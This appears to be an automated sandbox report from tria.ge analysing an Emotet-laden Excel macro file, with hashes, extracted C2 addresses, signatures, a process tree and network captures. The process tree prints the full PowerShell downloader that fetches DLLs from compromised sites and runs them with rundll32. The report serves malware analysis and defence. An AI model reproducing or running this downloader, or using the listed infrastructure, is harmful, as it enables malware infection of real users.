Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

24/11/2021, 17:59 UTC

211124-wk8rgsddbm 10

22/11/2021, 14:46 UTC

211122-r5n6csagd6 10

22/11/2021, 14:46 UTC

211122-r5csbsfgdp 10

22/11/2021, 14:44 UTC

211122-r4kfsafgdn 10

22/11/2021, 14:41 UTC

211122-r2x9vsfgcq 10

22/11/2021, 14:20 UTC

211122-rneklaffgr 10

22/11/2021, 14:15 UTC

211122-rkk8zaffgl 10

17/11/2021, 06:51 UTC

211117-hm1l1aeefm 10

17/11/2021, 06:37 UTC

211117-hdnk3seedn 10

Analysis

  • max time kernel
    49s
  • max time network
    57s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    17/11/2021, 06:51 UTC

General

  • Target

    865663204559_17_Nov_2021.xlsm

  • Size

    44KB

  • MD5

    477fd718bb764ffe3c5afde16c6c8dd2

  • SHA1

    eb932e19d95f88d64270d40cdc0b92c6d1cf63be

  • SHA256

    ee880ebdf26a1bcebe70a7ba17659199833c6107d758e26d37502bed9a225ee3

  • SHA512

    f7d0451ca3670179cc93a680b99f8982204c43054c55eb479c38dc8ea0ba6ba5b6ebea4508569091c07d95a759841455605e6daeab445146b29fc1af377ba267

Malware Config

Extracted

Family

emotet

Botnet

Epoch4

C2

91.200.186.228:443

191.252.196.221:8080

94.177.248.64:443

66.42.55.5:7080

103.8.26.103:8080

185.184.25.237:8080

103.8.26.102:8080

178.79.147.66:8080

58.227.42.236:80

45.118.135.203:7080

103.75.201.2:443

195.154.133.20:443

45.142.114.231:8080

212.237.5.209:443

207.38.84.195:8080

104.251.214.46:8080

212.237.17.99:8080

212.237.56.116:7080

216.158.226.206:443

110.232.117.186:8080

eck1.plain
1
-----BEGIN PUBLIC KEY-----
2
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE86M1tQ4uK/Q1Vs0KTCk+fPEQ3cuw
3
TyCz+gIgzky2DB5Elr60DubJW5q9Tr2dj8/gEFs0TIIEJgLTuqzx+58sdg==
4
-----END PUBLIC KEY-----
ecs1.plain
1
-----BEGIN PUBLIC KEY-----
2
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEQF90tsTY3Aw9HwZ6N9y5+be9Xoov
3
pqHyD6F5DRTl9THosAoePIs/e5AdJiYxhmV8Gq3Zw1ysSPBghxjZdDxY+Q==
4
-----END PUBLIC KEY-----

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • suricata: ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)

    suricata: ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)

  • suricata: ET MALWARE W32/Emotet CnC Beacon 3

    suricata: ET MALWARE W32/Emotet CnC Beacon 3

  • Blocklisted process makes network request 16 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\865663204559_17_Nov_2021.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3152
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"https://evgeniys.ru/sap-logs/D6/,http://crownadvertising.ca/wp-includes/OxiAACCoic/,https://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/,http://immoinvest.com.br/blog_old/wp-admin/luoT/,https://yoho.love/wp-content/e4laFBDXIvYT6O/,https://www.168801.xyz/wp-content/6J3CV4meLxvZP/,https://www.pasionportufuturo.pe/wp-content/XUBS/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:3052
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell $dfkj="$strs=\"https://evgeniys.ru/sap-logs/D6/,http://crownadvertising.ca/wp-includes/OxiAACCoic/,https://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/,http://immoinvest.com.br/blog_old/wp-admin/luoT/,https://yoho.love/wp-content/e4laFBDXIvYT6O/,https://www.168801.xyz/wp-content/6J3CV4meLxvZP/,https://www.pasionportufuturo.pe/wp-content/XUBS/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4744
        • C:\Windows\SysWow64\rundll32.exe
          "C:\Windows\SysWow64\rundll32.exe" C:\ProgramData\37926850.dll,f1541763150
          4⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:4336
          • C:\Windows\SysWOW64\rundll32.exe
            C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\37926850.dll",Control_RunDLL
            5⤵
            • Loads dropped DLL
            • Drops file in System32 directory
            • Suspicious use of WriteProcessMemory
            PID:3768
            • C:\Windows\SysWOW64\rundll32.exe
              C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vhhcsaycitojwot\zymfkff.jad",bgoHsrDVNbITvy
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1220
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Vhhcsaycitojwot\zymfkff.jad",Control_RunDLL
                7⤵
                • Blocklisted process makes network request
                • Suspicious behavior: EnumeratesProcesses
                PID:3788

Network

  • flag-us
    DNS
    time.windows.com
    Remote address:
    8.8.8.8:53
    Request
    time.windows.com
    IN A
    Response
    time.windows.com
    IN CNAME
    twc.trafficmanager.net
    twc.trafficmanager.net
    IN A
    20.101.57.9
  • flag-us
    DNS
    evgeniys.ru
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    evgeniys.ru
    IN A
    Response
    evgeniys.ru
    IN A
    159.253.18.185
  • flag-ee
    GET
    https://evgeniys.ru/sap-logs/D6/
    powershell.exe
    Remote address:
    159.253.18.185:443
    Request
    GET /sap-logs/D6/ HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.15063.0
    Host: evgeniys.ru
    Connection: Keep-Alive
    Response
    HTTP/1.1 502 Bad Gateway
    Server: nginx/1.20.1
    Date: Wed, 17 Nov 2021 06:52:32 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 157
    Connection: keep-alive
  • flag-us
    DNS
    ts-crl.ws.symantec.com
    Remote address:
    8.8.8.8:53
    Request
    ts-crl.ws.symantec.com
    IN A
    Response
    ts-crl.ws.symantec.com
    IN CNAME
    crl-symcprod.digicert.com
    crl-symcprod.digicert.com
    IN CNAME
    cs9.wac.phicdn.net
    cs9.wac.phicdn.net
    IN A
    72.21.91.29
  • flag-us
    GET
    http://ts-crl.ws.symantec.com/sha256-tss-ca.crl
    Remote address:
    72.21.91.29:80
    Request
    GET /sha256-tss-ca.crl HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/10.0
    Host: ts-crl.ws.symantec.com
    Response
    HTTP/1.1 200 OK
    Accept-Ranges: bytes
    Age: 1880
    Cache-Control: public, max-age=3600
    Content-Type: application/pkix-crl
    Date: Wed, 17 Nov 2021 06:52:33 GMT
    Last-Modified: Wed, 17 Nov 2021 06:21:13 GMT
    Server: ECS (bsa/EB1D)
    X-Cache: HIT
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    X-XSS-Protection: 1; mode=block
    Content-Length: 502
  • flag-us
    DNS
    crownadvertising.ca
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    crownadvertising.ca
    IN A
    Response
    crownadvertising.ca
    IN A
    209.124.90.7
  • flag-us
    GET
    http://crownadvertising.ca/wp-includes/OxiAACCoic/
    powershell.exe
    Remote address:
    209.124.90.7:80
    Request
    GET /wp-includes/OxiAACCoic/ HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.15063.0
    Host: crownadvertising.ca
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Wed, 17 Nov 2021 06:58:52 GMT
    Server: Apache
    Cache-Control: no-cache, must-revalidate
    Pragma: no-cache
    Expires: Wed, 17 Nov 2021 06:58:52 GMT
    Content-Disposition: attachment; filename="UodrR7fwzu3RaDkTn.dll"
    Content-Transfer-Encoding: binary
    Set-Cookie: 6194a82caa433=1637132332; expires=Wed, 17-Nov-2021 06:59:52 GMT; Max-Age=60; path=/
    Upgrade: h2,h2c
    Connection: Upgrade, Keep-Alive
    Last-Modified: Wed, 17 Nov 2021 06:58:52 GMT
    Keep-Alive: timeout=5, max=100
    Transfer-Encoding: chunked
    Content-Type: application/x-msdownload
  • flag-pl
    GET
    https://91.200.186.228/ZwqheMGTjywOmezAEJyQMYEIaGCEdGjncIyGWaNllKBZDtiZIcONKPhTpbnUT
    rundll32.exe
    Remote address:
    91.200.186.228:443
    Request
    GET /ZwqheMGTjywOmezAEJyQMYEIaGCEdGjncIyGWaNllKBZDtiZIcONKPhTpbnUT HTTP/1.1
    Cookie: pujJXuQIqQvUyNh=QOnrrbCCgj3Zmq9aewBzkVddnIe84nKDTvhWWhFcNgMMFLE/1AACS61XfAQ4fVvIzN6X6lkgqneC60SkUqPiOHHzAwKx5T2wU2D3AXnAp/Gn03CvOGz6woR4G+g0QwB1aVzUc0fUEQmpZGkeGWsnYa9yQiVccY44iQNtKGDUDkMrZ65MxmzwuNA5lRBHD/iSX6pRwN06wpucZlS7E97BjIkc6rLbHBuhTwDBMXwqBgEPw8tDoWPSzoSJWkdALbwlm9UmhtviM3mFCXVN69tbIbiqu3HlTu9aCaSPzfKhkMat6bDiID6aKfH+DmtX8m5+UcNvPmUvIPn+UTrMxYnJY8F0bN6kJq/swEM=
    Host: 91.200.186.228
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 502 Bad Gateway
    Server: nginx
    Date: Wed, 17 Nov 2021 06:52:45 GMT
    Content-Type: text/html
    Content-Length: 173
    Connection: keep-alive
  • flag-br
    GET
    https://191.252.196.221:8080/VzfLTULjpgjdGOpXxvzbayGhToI
    rundll32.exe
    Remote address:
    191.252.196.221:8080
    Request
    GET /VzfLTULjpgjdGOpXxvzbayGhToI HTTP/1.1
    Cookie: DzzDqZx=QOnrrbCCgj3Zmq9aewBzkVddnIe84nKDTvhWWhFcNgMMFLE/1AACS61XfAQ4fVvIzN6X6lkgqneC60SkUqPiOHHzAwKx5T2wU2D3AXnAp/Gn03CvOGz6woR4G+g0QwB1aVzUc0fUEQmpZGkeGWsnYa9yQiVccY44iQNtKGDUDkMrZ65MxmzwuNA5lRBHD/iSX6pRwN06wpucZlS7E97BjPcG5MDpBJsAoBqk6icayhmgkD4q4w==
    Host: 191.252.196.221:8080
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 502 Bad Gateway
    Server: nginx
    Date: Wed, 17 Nov 2021 06:51:52 GMT
    Content-Type: text/html
    Content-Length: 173
    Connection: keep-alive
  • flag-gb
    GET
    https://94.177.248.64/nwzJidAUAVAeHLIpvhKbMiHEJeLdTwAE
    rundll32.exe
    Remote address:
    94.177.248.64:443
    Request
    GET /nwzJidAUAVAeHLIpvhKbMiHEJeLdTwAE HTTP/1.1
    Cookie: FgivrmzWJKd=QOnrrbCCgj3Zmq9aewBzkVddnIe84nKDTvhWWhFcNgMMFLE/1AACS61XfAQ4fVvIzN6X6lkgqneC60SkUqPiOHHzAwKx5T2wU2D3AXnAp/Gn03CvOGz6woR4G+g0QwB1aVzUc0fUEQmpZGkeGWsnYa9yQiVccY44iQNtKGDUDkMrZ65MxmzwuNA5lRBHD/iSX6pRwN06wpucZlS7E97BjNt78WQf8wC8OsWiiSGKbxoNz5Mlyr80s4Y6Nqwad9s4c3lHlEIYegVe7q7BZWzJEigMS6UH8AYqSzJWDSt0wpMnNPL+3mM+UvURhnwFPnp7+9SAQquV/d3wChvMNGg=
    Host: 94.177.248.64
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 502 Bad Gateway
    Server: nginx
    Date: Wed, 17 Nov 2021 06:52:46 GMT
    Content-Type: text/html
    Content-Length: 173
    Connection: keep-alive
  • flag-sg
    GET
    https://66.42.55.5:7080/QeIeYUtyTnocpQaogwVYwNDZpf
    rundll32.exe
    Remote address:
    66.42.55.5:7080
    Request
    GET /QeIeYUtyTnocpQaogwVYwNDZpf HTTP/1.1
    Cookie: gnSXtrLhrUf=QOnrrbCCgj3Zmq9aewBzkVddnIe84nKDTvhWWhFcNgMMFLE/1AACS61XfAQ4fVvIzN6X6lkgqneC60SkUqPiOHHzAwKx5T2wU2D3AXnAp/Gn03CvOGz6woR4G+g0QwB1aVzUc0fUEQmpZGkeGWsnYa9yQiVccY44iQNtKGDUDkMrZ65MxmzwuNA5lRBHD/iSX6pRwN06wpucZlS7E97BjM2vr+Mi8Yn+w3gvze0AQh0JQETMm513IoVH00VyHAKr0eTLAwvRxymVTSe5LsLFspJeogi/mFcTATZHuW4jl3eXLWKnTWMrVObkfVUhghs9N9jfEWhx
    Host: 66.42.55.5:7080
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 502 Bad Gateway
    Server: nginx
    Date: Wed, 17 Nov 2021 06:52:48 GMT
    Content-Type: text/html
    Content-Length: 173
    Connection: keep-alive
  • flag-my
    GET
    https://103.8.26.103:8080/NxdmDoEmPqWQPqCHdmrcwKhyykYxYPospVRTNMNWfCwZiicPoMXmLHdcLdGLz
    rundll32.exe
    Remote address:
    103.8.26.103:8080
    Request
    GET /NxdmDoEmPqWQPqCHdmrcwKhyykYxYPospVRTNMNWfCwZiicPoMXmLHdcLdGLz HTTP/1.1
    Cookie: JuI=QOnrrbCCgj3Zmq9aewBzkVddnIe84nKDTvhWWhFcNgMMFLE/1AACS61XfAQ4fVvIzN6X6lkgqneC60SkUqPiOHHzAwKx5T2wU2D3AXnAp/Gn03CvOGz6woR4G+g0QwB1aVzUc0fUEQmpZGkeGWsnYa9yQiVccY44iQNtKGDUDkMrZ65MxmzwuNA5lRBHD/iSX6pRwN06wpucZlS7E97BjCj3aA6LOuLM1jIAZc7GTdUEU2Cygzvd4aEtSlrDoIbHE2ra+xGUnrSSstwfqiBCKtJ4Y0eMatw=
    Host: 103.8.26.103:8080
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 502 Bad Gateway
    Server: nginx
    Date: Wed, 17 Nov 2021 06:49:19 GMT
    Content-Type: text/html
    Content-Length: 173
    Connection: keep-alive
  • flag-tr
    GET
    https://185.184.25.237:8080/bbvnXhazGBzueQrEphcDhqZugMEeSWSbxGSeokqg
    rundll32.exe
    Remote address:
    185.184.25.237:8080
    Request
    GET /bbvnXhazGBzueQrEphcDhqZugMEeSWSbxGSeokqg HTTP/1.1
    Cookie: ZNVjOb=QOnrrbCCgj3Zmq9aewBzkVddnIe84nKDTvhWWhFcNgMMFLE/1AACS61XfAQ4fVvIzN6X6lkgqneC60SkUqPiOHHzAwKx5T2wU2D3AXnAp/Gn03CvOGz6woR4G+g0QwB1aVzUc0fUEQmpZGkeGWsnYa9yQiVccY44iQNtKGDUDkMrZ65MxmzwuNA5lRBHD/iSX6pRwN06wpucZlS7E97BjGPihGGwSiSLACRn9RRbzOPNAQhwcBG2HgcDvMfDWtOZ4Nhv7qMm/59RB+Qp7NunqVW1m60BXwUDtadMtSplWxed8i95E6tIGM/BS+TQV2gyNyOnYPg+nc9zF5qlVPAnYgRRnfzlfFpdAzCFI8MZl+uaFQpZH+dXFQNevi4kbQ==
    Host: 185.184.25.237:8080
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 502 Bad Gateway
    Server: nginx
    Date: Wed, 17 Nov 2021 06:42:54 GMT
    Content-Type: text/html
    Content-Length: 173
    Connection: keep-alive
  • flag-my
    GET
    https://103.8.26.102:8080/EmBcaBdTElzGHNGhHQznSSJTeXNLqkjGhyKZfkWTJfbMxYEXW
    rundll32.exe
    Remote address:
    103.8.26.102:8080
    Request
    GET /EmBcaBdTElzGHNGhHQznSSJTeXNLqkjGhyKZfkWTJfbMxYEXW HTTP/1.1
    Cookie: JFWoEQUIXvl=QOnrrbCCgj3Zmq9aewBzkVddnIe84nKDTvhWWhFcNgMMFLE/1AACS61XfAQ4fVvIzN6X6lkgqneC60SkUqPiOHHzAwKx5T2wU2D3AXnAp/Gn03CvOGz6woR4G+g0QwB1aVzUc0fUEQmpZGkeGWsnYa9yQiVccY44iQNtKGDUDkMrZ65MxmzwuNA5lRBHD/iSX6pRwN06wpucZlS7E97BjLgAzyV2ejz3DPVRoGdTBelOs74qJh/6IISv36ABW5nDxXDiHIGhToU/r6s=
    Host: 103.8.26.102:8080
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 502 Bad Gateway
    Server: nginx
    Date: Wed, 17 Nov 2021 06:49:21 GMT
    Content-Type: text/html
    Content-Length: 173
    Connection: keep-alive
  • 159.253.18.185:443
    https://evgeniys.ru/sap-logs/D6/
    tls, http
    powershell.exe
    856 B
    5.4kB
    9
    8

    HTTP Request

    GET https://evgeniys.ru/sap-logs/D6/

    HTTP Response

    502
  • 72.21.91.29:80
    http://ts-crl.ws.symantec.com/sha256-tss-ca.crl
    http
    324 B
    996 B
    4
    3

    HTTP Request

    GET http://ts-crl.ws.symantec.com/sha256-tss-ca.crl

    HTTP Response

    200
  • 209.124.90.7:80
    http://crownadvertising.ca/wp-includes/OxiAACCoic/
    http
    powershell.exe
    4.7kB
    266.8kB
    99
    187

    HTTP Request

    GET http://crownadvertising.ca/wp-includes/OxiAACCoic/

    HTTP Response

    200
  • 91.200.186.228:443
    https://91.200.186.228/ZwqheMGTjywOmezAEJyQMYEIaGCEdGjncIyGWaNllKBZDtiZIcONKPhTpbnUT
    tls, http
    rundll32.exe
    1.3kB
    2.3kB
    10
    8

    HTTP Request

    GET https://91.200.186.228/ZwqheMGTjywOmezAEJyQMYEIaGCEdGjncIyGWaNllKBZDtiZIcONKPhTpbnUT

    HTTP Response

    502
  • 191.252.196.221:8080
    https://191.252.196.221:8080/VzfLTULjpgjdGOpXxvzbayGhToI
    tls, http
    rundll32.exe
    1.1kB
    2.3kB
    10
    8

    HTTP Request

    GET https://191.252.196.221:8080/VzfLTULjpgjdGOpXxvzbayGhToI

    HTTP Response

    502
  • 94.177.248.64:443
    https://94.177.248.64/nwzJidAUAVAeHLIpvhKbMiHEJeLdTwAE
    tls, http
    rundll32.exe
    1.2kB
    2.3kB
    10
    8

    HTTP Request

    GET https://94.177.248.64/nwzJidAUAVAeHLIpvhKbMiHEJeLdTwAE

    HTTP Response

    502
  • 66.42.55.5:7080
    https://66.42.55.5:7080/QeIeYUtyTnocpQaogwVYwNDZpf
    tls, http
    rundll32.exe
    1.2kB
    2.3kB
    10
    8

    HTTP Request

    GET https://66.42.55.5:7080/QeIeYUtyTnocpQaogwVYwNDZpf

    HTTP Response

    502
  • 103.8.26.103:8080
    https://103.8.26.103:8080/NxdmDoEmPqWQPqCHdmrcwKhyykYxYPospVRTNMNWfCwZiicPoMXmLHdcLdGLz
    tls, http
    rundll32.exe
    1.2kB
    2.3kB
    10
    8

    HTTP Request

    GET https://103.8.26.103:8080/NxdmDoEmPqWQPqCHdmrcwKhyykYxYPospVRTNMNWfCwZiicPoMXmLHdcLdGLz

    HTTP Response

    502
  • 185.184.25.237:8080
    https://185.184.25.237:8080/bbvnXhazGBzueQrEphcDhqZugMEeSWSbxGSeokqg
    tls, http
    rundll32.exe
    1.3kB
    2.3kB
    10
    8

    HTTP Request

    GET https://185.184.25.237:8080/bbvnXhazGBzueQrEphcDhqZugMEeSWSbxGSeokqg

    HTTP Response

    502
  • 103.8.26.102:8080
    https://103.8.26.102:8080/EmBcaBdTElzGHNGhHQznSSJTeXNLqkjGhyKZfkWTJfbMxYEXW
    tls, http
    rundll32.exe
    1.2kB
    2.3kB
    10
    8

    HTTP Request

    GET https://103.8.26.102:8080/EmBcaBdTElzGHNGhHQznSSJTeXNLqkjGhyKZfkWTJfbMxYEXW

    HTTP Response

    502
  • 178.79.147.66:8080
    rundll32.exe
    156 B
    120 B
    3
    3
  • 58.227.42.236:80
    rundll32.exe
    156 B
    120 B
    3
    3
  • 45.118.135.203:7080
    rundll32.exe
    156 B
    120 B
    3
    3
  • 103.75.201.2:443
    rundll32.exe
    156 B
    120 B
    3
    3
  • 195.154.133.20:443
    rundll32.exe
    156 B
    120 B
    3
    3
  • 45.142.114.231:8080
    rundll32.exe
    156 B
    3
  • 8.8.8.8:53
    time.windows.com
    dns
    62 B
    114 B
    1
    1

    DNS Request

    time.windows.com

    DNS Response

    20.101.57.9

  • 20.101.57.9:123
    time.windows.com
    ntp
    152 B
    2
  • 8.8.8.8:53
    evgeniys.ru
    dns
    powershell.exe
    57 B
    73 B
    1
    1

    DNS Request

    evgeniys.ru

    DNS Response

    159.253.18.185

  • 8.8.8.8:53
    ts-crl.ws.symantec.com
    dns
    68 B
    152 B
    1
    1

    DNS Request

    ts-crl.ws.symantec.com

    DNS Response

    72.21.91.29

  • 8.8.8.8:53
    crownadvertising.ca
    dns
    powershell.exe
    65 B
    81 B
    1
    1

    DNS Request

    crownadvertising.ca

    DNS Response

    209.124.90.7

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/3152-120-0x000002713B700000-0x000002713B702000-memory.dmp

    Filesize

    8KB

  • memory/3152-119-0x00007FFAE6A50000-0x00007FFAE6A60000-memory.dmp

    Filesize

    64KB

  • memory/3152-122-0x000002713B700000-0x000002713B702000-memory.dmp

    Filesize

    8KB

  • memory/3152-115-0x00007FFAE6A50000-0x00007FFAE6A60000-memory.dmp

    Filesize

    64KB

  • memory/3152-116-0x00007FFAE6A50000-0x00007FFAE6A60000-memory.dmp

    Filesize

    64KB

  • memory/3152-117-0x00007FFAE6A50000-0x00007FFAE6A60000-memory.dmp

    Filesize

    64KB

  • memory/3152-118-0x00007FFAE6A50000-0x00007FFAE6A60000-memory.dmp

    Filesize

    64KB

  • memory/3152-121-0x000002713B700000-0x000002713B702000-memory.dmp

    Filesize

    8KB

  • memory/4336-340-0x0000000010000000-0x0000000010028000-memory.dmp

    Filesize

    160KB

  • memory/4744-310-0x0000024913CB8000-0x0000024913CB9000-memory.dmp

    Filesize

    4KB

  • memory/4744-294-0x0000024913CB6000-0x0000024913CB8000-memory.dmp

    Filesize

    8KB

  • memory/4744-292-0x0000024913CB0000-0x0000024913CB2000-memory.dmp

    Filesize

    8KB

  • memory/4744-293-0x0000024913CB3000-0x0000024913CB5000-memory.dmp

    Filesize

    8KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.